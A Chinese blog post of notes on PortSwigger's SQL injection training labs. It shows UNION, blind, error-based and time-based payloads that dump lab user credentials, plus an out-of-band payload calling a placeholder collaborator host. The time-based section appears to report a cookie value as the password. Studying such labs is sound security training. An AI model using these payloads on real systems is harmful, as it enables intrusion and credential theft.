(一)SQL注入实例

最新推荐文章于 2024-05-08 21:46:20 发布
最新推荐文章于 2024-05-08 21:46:20 发布
阅读量2k 收藏 2
点赞数 2
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43047908/article/details/115549706
版权

SQL injection UNION attack

SQL injection UNION attack, determining the number of columns returned by the query

GET /filter?category=Gifts HTTP/1.1
Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac691f351f548a1780ec009d00da0072.web-security-academy.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=CrXENk7PvFRUcVh0IpJ221mF8Pm780Ej

分析可得在category=Gifts处存在注入点,使用UNION联合查询
将包发送到repeat模块

修改category='+UNION+SELECT+NULL--,send,响应

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 21

Internal Server Error

由此推断column数目不为一
则修改'+UNION+SELECT+NULL,NULL--,同样返回500状态码
继续添加空值列,修改为category='+UNION+SELECT+NULL,NULL,NULL--
发现response页面返回正常
在这里插入图片描述

因此该数据库column数目为3.

SQL injection UNION attack, finding a column containing text

首先确认返回的列数

'+UNION+SELECT+NULL,NULL,NULL--

然后接下来就是对每个NULL值分别试探以确定哪些列与字符串数据兼容
修改'+UNION+SELECT+'abcdef',NULL,NULL--,返回状态码500

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 21

Internal Server Error

修改'+UNION+SELECT+NULL,'abcdef',NULL--,返回正常页面
在这里插入图片描述

修改'+UNION+SELECT+NULL,NULL,'abcdef'--,返回状态码500

由此可以得出该数据库三列中第二列与字符串数据兼容。

SQL injection UNION attack, retrieving data from other tables

首先确定查询正在返回的列数以及哪些列包含文本数据。
例如category参数中的,验证查询是否返回两列都包含文本的列'+UNION+SELECT+'abc','def'--
在这里插入图片描述
返回正常页面响应,则表明列数为2且都为包含文本的列
已知该数据库包含另一个名为users的表,其列名为username和password。
则可以实现跨表查询
修改category参数为'+UNION+SELECT+username,+password+FROM+users--,返回

<section class="ecoms-pageheader">
                        <h1>&apos; UNION SELECT username, password FROM users--</h1>
                    </section>
                    <section class="search-filters">
                        <label>Refine your search:</label>
                        <a href="/">All</a>
                        <a href="/filter?category=Accessories">Accessories</a>
                        <a href="/filter?category=Clothing%2c+shoes+and+accessories">Clothing, shoes and accessories</a>
                        <a href="/filter?category=Gifts">Gifts</a>
                        <a href="/filter?category=Pets">Pets</a>
                        <a href="/filter?category=Tech+gifts">Tech gifts</a>
                    </section>
                    <table class="is-table-longdescription">
                        <tbody>
                        <tr>
                            <th>wiener</th>
                            <td>389u8a8hxr1rcwdbz29j</td>
                        </tr>
                        <tr>
                            <th>administrator</th>
                            <td>kcbroqow89lu3842bwdm</td>
                        </tr>
                        <tr>
                            <th>carlos</th>
                            <td>5h526m72ehuvxjoemvpb</td>
                        </tr>
                        </tbody>
wiener389u8a8hxr1rcwdbz29j
administratorkcbroqow89lu3842bwdm
carlos5h526m72ehuvxjoemvpb

利用administraor登录,成功登录后台。
在这里插入图片描述

SQL injection UNION attack, retrieving multiple values in a single column

同样是先使用union查询确认数据库返回两列,

category='+UNION+SELECT+NULL,'qqq'--

返回正常响应,则只有第二列包含文本

已知该数据库包含另一个名为users的表,其列名为username和password。
构造payload:'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
注:|| 将多个字符串连接在一起以组成一个字符串

成功返回用户名和密码

<table class="is-table-list">
                        <tbody>
                        <tr>
                            <th>administrator~np91ddn9gdeh9t61qf0k</th>
                        </tr>
                        <tr>
                            <th>wiener~i0tobfpd0qgpnh0kncb5</th>
                        </tr>
                        <tr>
                            <th>carlos~3zo93g8zh838lebd9ipj</th>
                        </tr>
                        </tbody>
                    </table>

利用administrator~np91ddn9gdeh9t61qf0k,username~password成功登录
在这里插入图片描述
SQL injection attack, querying the database type and version on Oracle

注:在Oracle数据库上,每个SELECT语句都必须指定要选择的表FROM。如果您的UNION SELECT攻击没有从表中查询,您仍然需要在FROM关键字后面加上有效的表名。

Oracle上有一个内置的表,称为DUAL,可用于此目的。例如:UNION SELECT ‘abc’ FROM DUAL

构造payload:'+UNION+SELECT+'abc','def'+FROM+DUAL--
修改category,返回响应正常

</section>
                    <section class="ecoms-pageheader">
                        <h1>&apos; UNION SELECT &apos;abc&apos;,&apos;def&apos; FROM DUAL--</h1>
                    </section>
                    <section class="search-filters">
                        <label>Refine your search:</label>
                        <a href="/">All</a>
                        <a href="/filter?category=Accessories">Accessories</a>
                        <a href="/filter?category=Clothing%2c+shoes+and+accessories">Clothing, shoes and accessories</a>

因而根据返回判定返回两列,且这两列都包含文本

因此构造 '+UNION+SELECT+BANNER,+NULL+FROM+v$version--,返回

CORE 11.2.0.2.0 Production
NLSRTL Version 11.2.0.2.0 - Production
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production
TNS for Linux: Version 11.2.0.2.0 - Production

SQL injection attack, querying the database type and version on MySQL and Microsoft

构造payload:category=Lifestyle+'+UNION+SELECT+'abc','def'#
判定为两列且都包含文本
则构造payload:category=Lifestyle+'+UNION+SELECT+NULL,@@version#
得到版本

8.0.23

SQL injection attack, listing the database contents on non-Oracle databases

该应用程序具有登录功能,并且数据库包含一个包含用户名和密码的表。您需要确定该表的名称及其包含的列,然后检索该表的内容以获得所有用户的用户名和密码。

同样首先是确定返回的列数量和包含文本的列
构造payload:'+UNION+SELECT+'abc','def'--,返回正常响应
构造攻击payload:'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
重放,则(注:只列出部分表)

pg_user_mapping
pg_publication
pg_stat_xact_sys_tables
foreign_data_wrappers
routine_privileges
pg_views
pg_foreign_table
pg_statio_sys_indexes
pg_database
_pg_foreign_data_wrappers
user_mappings
pg_class
pg_foreign_server
pg_type
view_column_usage
pg_replication_origin_status
applicable_roles
pg_group
views
domain_constraints
pg_shadow
pg_stat_user_tables
view_table_usage
pg_transform
pg_stat_sys_indexes
role_routine_grants
role_column_grants
user_mapping_options
pg_aggregate
pg_stat_database_conflicts
pg_hba_file_rules
pg_stat_database
sql_sizing
triggers
triggered_update_columns
pg_tables
usage_privileges
foreign_table_options
pg_authid
pg_index
pg_prepared_xacts
pg_description
pg_auth_members
pg_cursors
pg_statistic_ext
pg_statio_all_sequences
pg_stat_replication
pg_settings
role_table_grants
pg_statio_all_indexes
pg_depend
pg_subscription
pg_subscription_rel
columns
pg_stat_xact_user_tables
sequences
pg_stats
pg_seclabels
pg_attribute
check_constraints
pg_rules
users_aiaxdw
pg_timezone_abbrevs
pg_default_acl
pg_stat_sys_tables
pg_shseclabel
pg_stat_bgwriter
pg_opclass
pg_sequence
foreign_server_options
constraint_column_usage
pg_operator
pg_extension
view_routine_usage
pg_indexes
pg_replication_slots
sql_parts

查找包含用户凭据的表:users_aiaxdw
然后构造payload:'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_aiaxdw'--
查找到包含用户名和密码的列的名称

password_qzxivj
username_sivltj

构造payload检索username和password:'+UNION+SELECT+username_sivltj,+password_qzxivj+FROM+users_aiaxdw--
返回如下:

wienerqz4hc0e97qqal46i8stp
carlosjzwjww78ulk4fndzafwh
administratorandnlncdtbu2ca2yl4le

最后成功登录到管理员后台
在这里插入图片描述

SQL injection attack, listing the database contents on Oracle

该应用程序具有登录功能,并且数据库包含一个包含用户名和密码的表。您需要确定该表的名称及其包含的列,然后检索该表的内容以获得所有用户的用户名和密码。

构造payload:'+UNION+SELECT+'abc','def'+FROM+DUAL--
正常返回响应,则表明返回列数为2且都包含文本
则构造payload:category='+UNION+SELECT+table_name,NULL+FROM+all_tables--
成功得到数据库的所有表名,查找包含用户凭据的表的名称(只列出部分,太多了~~)

<tr>
                            <th>USER$</th>
                        </tr>
                        <tr>
                            <th>USERS_WWNDAO</th>
                        </tr>
                        <tr>
                            <th>USER_ASTATUS_MAP</th>
                        </tr>
                        <tr>
                            <th>USER_HISTORY$</th>
                        </tr>

猜测得知具有用户凭据的表为USERS_WWNDAO
查找包含用户名和密码的列的名称
则构造payload:'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_WWNDAO'--
得到列名:

PASSWORD_AHEEEZ
USERNAME_WNKKQZ

则构造payload查找具体数据:'+UNION+SELECT+USERNAME_WNKKQZ,+PASSWORD_AHEEEZ+FROM+USERS_WWNDAO--

administratorbbp5iy7d3bul1rmmsdk1
carlosd91dis6vi4opsmsm16bt
wieneraf3ju06mn9kzf0jcseyc

利用Administrator成功登录管理员后台
在这里插入图片描述

Blind SQL injection

Blind SQL injection with conditional responses

已知包含一个盲目的SQL注入漏洞。该应用程序使用跟踪cookie进行分析,并执行一个SQL查询,其中包含提交的cookie的值。
不返回SQL查询的结果,并且不显示任何错误消息。但是,如果查询返回任何行,应用程序将在页面中包含“Welcome back”消息。

抓包

GET / HTTP/1.1
Host: ac3e1f091ff31d6480cf2ccc00de00d7.web-security-academy.net
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: TrackingId=ES6RqmYQlAy4E2Zp; session=GpkPKr5ktE5gUYaTEZshUkApXidUpAIS

发现cookie处可能存在注入点
构造payload:ES6RqmYQlAy4E2Zp' AND '1'='1,发现response成功回显

<section class="top-links">
                            <a href=/>Home</a><p>|</p>
                            <div>Welcome back!</div><p>|</p>
                            <a href="/my-account">My account</a><p>|</p>
                        </section>

将payload修改为:ES6RqmYQlAy4E2Zp' AND '1'='2时,

<section class="top-links">
                            <a href=/>Home</a><p>|</p>
                            <a href="/my-account">My account</a><p>|</p>
                        </section>

则证明存在注入点.
构造payload:ES6RqmYQlAy4E2Zp' AND (SELECT 'a' FROM users LIMIT 1)='a,成功回显Welcome back!。证明确认存在名为的表users,且该表中有包含“a”的记录

注:limit [offset,] rows

一般是用于select语句中用以从结果集中拿出特定的一部分数据。
offset是偏移量,表示我们现在需要的数据是跳过多少行数据之后的,可以忽略;rows表示我们现在要拿多少行数据。

继续进一步构造payload:ES6RqmYQlAy4E2Zp' AND (SELECT 'a' FROM users WHERE username='administrator')='a,同样成功回显Welcome back!
则证明确认有一个名为的用户administrator。
下一步确定administrator用户密码中有多少个字符。构造payload:ES6RqmYQlAy4E2Zp' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a。成功回显Welcome back!,密码长度显然是大于1的。因此接下来只需一次次修改password>1,2,3…等等,直到不回显Welcome back!为止。
但一次次试不符合程序员的风格。将包发送到intruder模块,循环发送数据包,得到
在这里插入图片描述
显然看出,当密码长度达到20时响应包长度发生变化,由此得出密码长度为20.
得到密码长度后,接下来就是猜测密码内容。
构造payload:ES6RqmYQlAy4E2Zp' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a,猜测密码的第一个字符
同样使用intruder模块爆破
在这里插入图片描述

由此看到,密码第一个字符为s,可以依次修改(password,1(2,3,4…20),1),也可以构造一个“炸弹型”的爆破方式。
在这里插入图片描述

最后得到密码:sr114e64ujr8kemfirs3
最后成功登录
在这里插入图片描述

Blind SQL injection with conditional errors

抓包

GET / HTTP/1.1
Host: ac341f5e1e4b73b880c6010200050013.web-security-academy.net
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: TrackingId=ysnBKCwqQMYpzhIi; session=pdOjnPVZjqmlE0T0smRwrknXLkiwkbPm

构造payload:TrackingId=ysnBKCwqQMYpzhIi'时,发送返回报错信息
当payload:TrackingId=ysnBKCwqQMYpzhIi''时,返回正常页面。
这表明语法错误(在这种情况下为未封闭的引号)正在对响应产生可检测的影响。
首先构造一个正常的子查询语句:ysnBKCwqQMYpzhIi''||(SELECT '')||',发现页面返回报错信息,可能是数据库差异的原因,重新构造:ysnBKCwqQMYpzhIi'||(SELECT '' FROM dual)||',发现返回正常页面。
因此可以判定该数据库为Oracle数据库。该数据库的SELECT后都要显式的指定表名。
接下来构造不正常的查询语句,例如尝试查询不存在的表名:ysnBKCwqQMYpzhIi'||(SELECT '' FROM afwefwafw)||',返回错误。这表明我的注入行为正在被后端作为SQL查询处理。
因此我们可以得出结论:只要确保语法上有效的SQL查询,就可以使用此错误响应来推断有关数据库的关键信息。例如:ysnBKCwqQMYpzhIi'||(SELECT '' FROM users WHERE ROWNUM = 1)||',返回正常页面,由此可以推断users表存在。
注:WHERE ROWNUM = 1条件对于防止查询返回多于一行的行很重要,因为这会破坏我们的串联

还可以用来测试条件。首先,提交以下查询:fuIkM2UFM3hAhjQ3'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||',返回错误信息。
将其更改为:fuIkM2UFM3hAhjQ3'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||',返回正常页面

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 11131

这表明我们可以根据特定条件的真实情况有条件地触发错误。该CASE语句测试条件,如果条件为true,则求值一个表达式,如果条件为false,则求值另一个表达式。前一个表达式包含被零除的值,这会导致错误。在这种情况下,这两个有效负载会测试条件1=1和1=2,并且条件为true时会接收到错误

我们可以使用此行为来测试表中是否存在特定的条目。例如:使用以下查询检查用户名是否administrator存在

fuIkM2UFM3hAhjQ3'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

验证条件是否正确(即返回错误信息),确认存在一个名为的用户administrator。

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 21

Internal Server Error

接下来是确定密码长度
构造payload:fuIkM2UFM3hAhjQ3'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||',返回错误,即条件为真,密码长度大于1,进过Intruder模块,最终得到密码长度为20
确认好密码长度后,接下来就是猜测密码内容
构造payload:fuIkM2UFM3hAhjQ3'||(SELECT CASE WHEN SUBSTR(password,§1§,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||',依次测试每个位置。
筛选statu为500错误信息的条目
在这里插入图片描述
由此得到密码为:f18fqgfgm4ia6k1ko73x

Blind SQL injection with time delays and information retrieval

包含一个盲目的SQL注入漏洞。该应用程序使用跟踪cookie进行分析,并执行一个SQL查询,其中包含提交的cookie的值。

不返回SQL查询的结果,并且应用程序不会根据查询返回任何行还是导致错误而做出任何不同的响应。但是,由于查询是同步执行的,因此有可能触发条件时间延迟以推断信息。

修改cookie ID:rMQv3wxPYFYZorIx'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--,等待十秒返回
修改cookie ID:rMQv3wxPYFYZorIx'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--,无需等待返回。
由此可以推断出存在时间注入漏洞。

构造payload:rMQv3wxPYFYZorIx'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--,发现等待10秒返回页面,则确认有一个名为的用户administrator。

下一步是确定administrator用户密码中有多少个字符。
构造payload:rMQv3wxPYFYZorIx'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--,发现需等待十秒延迟,则证明密码长度大于1,这是显然的。
则接下来只需修改LENGTH(password)>1(2,3,4,…),发现无需等待返回的即为密码长度。得到长度为20.

确定密码长度后,下一步是在每个位置测试字符以确定其值。发送到intruder模块,构造payload:rMQv3wxPYFYZorIx'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,§1§,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
运行,将延迟10000毫秒左右的筛选出来。
最后得到密码:rMQv3wxPYFYZorIx

Blind SQL injection with out-of-band interaction

dLZ2RlRTXR7T632G'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//YOUR-COLLABORATOR-ID.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Blind SQL injection with out-of-band data exfiltration

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

WHERE子句中的SQL注入漏洞允许检索隐藏数据
构造payload:'+OR+1=1--,相当于category=Lifestyle'+OR+1=1--即可查看全部数据。

SQL injection vulnerability allowing login bypass

username使用:administrator'--

她总是阴雨天
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入各种注入原理|绕过技巧|带实例详解|
BING
03-19 7832
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1244
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例:
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5377
BurpSuit官方实验室靶场-SQL注入通关记录。
【深度学习】网络安全,SQL注入识别,SQL注入检测,基于深度学习的sql注入语句识别,数据集,代码
最新发布
q742971636的博客
05-08 631
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过向应用程序的输入字段插入恶意SQL代码来执行未经授权的数据库操作。这种攻击通常发生在使用SQL数据库的网站或应用程序中。攻击者可以利用这个漏洞来获取敏感数据、修改数据、甚至完全控制数据库。SQL注入的原理是利用应用程序在处理用户输入时未正确过滤或转义数据的漏洞。通过在输入字段中插入SQL代码片段,攻击者可以改变SQL查询的逻辑,从而执行意外的数据库操作。这种攻击可能会导致严重的安全问题,包括数据泄露、数据损坏和系统崩溃。
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4936
sql注入详解
一文带你学习SQL注入
大河之犬的博客
12-21 5674
但需要注意的是,存储过程中也可能会存在注入问题,因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免,则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。下面是一个在Java中调用存储过程的例子,其中。
实例讲解SQL注入攻击
02-26
SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们,就会造成一些出人意料的结果。本...
SQL注入实例讲解
03-29
在这个“SQL注入实例讲解”中,我们将深入探讨这一话题,了解其工作原理,以及如何防范。 首先,让我们理解SQL注入的基本概念。在Web应用中,当用户的数据与数据库交互时,如果程序直接将用户的输入拼接到SQL查询中...
Mybatis防止sql注入实例
08-30
Mybatis防止sql注入实例 Mybatis框架作为一款半自动化的持久层框架,其sql语句都要我们自己来手动编写,这个时候当然需要防止sql注入。防止sql注入的方法有很多,例如将sql语句全部替换为存储过程的方式,但这种...
mybatis防止SQL注入的方法实例详解
08-27
MyBatis 防止 SQL 注入的方法实例详解 SQL 注入是一种简单的攻击手段,但直到今天仍然十分常见。MyBatis 作为一个流行的持久层框架,如何防止 SQL 注入呢?下面我们将详细介绍 MyBatis 防止 SQL 注入的方法实例详解...
SQL注入漏洞原理及注入示例
m0_62480631的博客
03-10 2004
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询等操作。用户可以修改参数或数据,传递给服务端,导致服务端拼接了伪造的SQL查询语句,并将伪造的SQL语句发送给数据库服务端执行,数据库将SQL语句的执行结果,返回给服务端,服务端又将结果返回给客户端,从而获取到敏感信息,甚至危险的代码或系统指令。
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
SQL注入基础原理与案例(详细总结)
剁椒鱼头没剁椒的博客
10-20 6583
本篇总结了学习SQL注入的笔记,暂时没总结WAF绕过方面的内容,后期会对WAF绕过进行总结。目前先总结一些基础的东西,可能有些参数不全,具体的参数或者函数可以百度搜索一下。发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
Sql注入实例
进击的小小白
01-09 1811
一,靶场环境 目标网站:http://172.16.43.117:8011/ 工具:椰树V1.9-web安全扫描工具 (最后附上网盘链接) 二,使用工具查找注入点 1,将url链接放入工具中,点击扫描网站,并且等状态栏为done时,扫描完成,发现2个注入点 三,进行注入 1,在刚刚发现的注入点上右击鼠标,选择第二项进行注入 2,跳转过后,打开数据库选项卡,看到数据库Test_E...
SQL注入攻击及防范
AlphaFinance
12-09 2199
为了防范SQL注入攻击,需要采取以下措施:一、对用户输入进行严格限制和过滤,应用程序应该严格限制用户输入的内容,只允许用户输入预定义的字符集,并对用户输入进行过滤,拒绝包含特殊字符的输入。二、使用参数化查询,参数化查询是指在执行SQL语句时,将用户输入的参数单独作为参数传入,而不是将用户输入的内容直接拼接到SQL语句中。通常情况下,SQL注入攻击是利用应用程序接受用户输入的漏洞,将恶意代码作为用户输入传入应用程序,让应用程序将恶意代码当作正常的SQL语句执行。
SQL注入(案例演示)
二师兄想吃肉的博客
01-09 1609
一、SQL注入是什么? 二、实现步骤 1.新建数据表 2.SQL注入分析 3.代码案例 三、防止SQL注入的方式
sql注入语句示例大全_通过示例了解SQL EXCEPT语句
culuo4781的博客
07-24 2764
sql注入语句示例大全 The SQL EXCEPT statement is one of the most commonly used statements to filter records when two SELECT statements are being used to select records. 当使用两个SELECT语句选择记录时,SQL EXCEPT语句是...
1 SQL injection
(∪.∪ )...zzz的博客
04-18 930
SQL injection 目录SQL injection一、What二、Influence三、SQL injection examples1.retrieving hidden data检索隐藏数据lab 12.subverting application logic颠覆应用程序逻辑lab2 SQL injection vulnerability allowing login bypass3.UNION attacks4. Examining the database检查数据库5.Blind SQL
SQL injection
weixin_33921089的博客
04-05 231
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database conten...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值